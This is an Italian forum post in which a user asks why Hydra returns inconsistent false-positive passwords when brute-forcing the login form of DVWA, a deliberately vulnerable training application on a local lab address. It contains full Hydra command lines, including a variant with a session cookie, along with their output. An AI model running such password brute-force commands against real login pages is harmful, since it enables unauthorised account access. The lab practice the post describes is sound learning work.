Ho un problema con Hydra quando lo uso. Ho provato le stesse linee di comando fornite nelle guide direttamente supportate dall'applicazione dannatamente vulnerabile Web (DVWA) v1.8.
Ok così .. ecco il mio tentativo di uscita ...
root@kali:~# hydra 192.168.1.2 -l admin -P /wordlists/500-worst-passwords.txt
http-get-form "/DVWA-1.0.8/vulnerabilities/brute/index.php:username=^USER^&
password=^PASS^&submit=Login:Username and/or password incorrect." -f
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2013-09-06 05:18:12
[DATA] 16 tasks, 1 server, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.1.2 login: admin password: shadow
[STATUS] attack finished for 192.168.1.2 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-09-06 05:18:12
Sì, è vero che il metodo del modulo HTML è GET. : O)
Ok, indipendentemente da quante volte eseguo il comando ottengo risposte diverse .. come ..
Tentativo 1
[80][www-form] host: 192.168.1.2 login: admin password: 101193
[80][www-form] host: 192.168.1.2 login: admin password: horse
Tentativo 2
[80][www-form] host: 192.168.1.2 login: admin password: carhorn
[80][www-form] host: 192.168.1.2 login: admin password: shadowfox
[80][www-form] host: 192.168.1.2 login: admin password: multible
UPDATE !!!!
hydra 192.168.1.2 -l admin -P /wordlists/500-worst-passwords.txt http-get-form
"/DVWA-1.0.8/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&
submit=Login:Username and/or password incorrect.:H=Cookie: security=high;
PHPSESSID=jtujthkeh08foqfomph232rp77"
Ho provato ad aggiungere anche l'ID phpsession dei cookie. Ho anche provato a inserire:
-t <tasks>
Finora non ho avuto successo.